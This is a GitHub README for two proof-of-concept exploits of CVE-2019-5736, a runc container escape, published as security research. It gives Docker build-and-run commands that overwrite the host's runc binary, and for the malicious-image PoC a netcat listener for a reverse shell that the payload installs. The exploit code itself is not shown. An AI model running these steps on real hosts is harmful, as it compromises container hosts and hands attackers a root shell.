RunC-CVE-2019-5736

Two PoCs for CVE-2019-5736. See Twistlock Labs for an explanation of CVE-2019-5736 and the PoCs.

The malicious image PoC is heavily based on q3k’s PoC, so all credit goes to him.

Running the PoCs

Note that running the PoCs will overwrite the runc binary on the host. It is recommened that you create a copy of your runc binary (commonly at /usr/sbin/runc) before running one of the PoCs.

Clone the repository:

$ git clone https://github.com/twistlock/RunC-CVE-2019-5736

Exec PoC

Overwrites runc with a simple program that prints a string.

Running the exec PoC:

$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

Malicious Image PoC

Overwrites runc with a simple reverse shell bash script that connects to localhost:2345.

Listen for the reverse shell:

$ nc -nvlp 2345

From a different shell, run the malicious image PoC:

$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

Name		Name	Last commit message	Last commit date
Latest commit History 17 Commits
exec_POC		exec_POC
malicious_image_POC		malicious_image_POC
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

exec_POC

exec_POC

malicious_image_POC

malicious_image_POC

README.md

README.md

Repository files navigation

RunC-CVE-2019-5736

Running the PoCs

Exec PoC

Malicious Image PoC

About

Releases

Packages

Languages

yuvalavra/RunC-CVE-2019-5736

Folders and files

Latest commit

History

Repository files navigation

RunC-CVE-2019-5736

Running the PoCs

Exec PoC

Malicious Image PoC

About

Resources

Stars

Watchers

Forks

Languages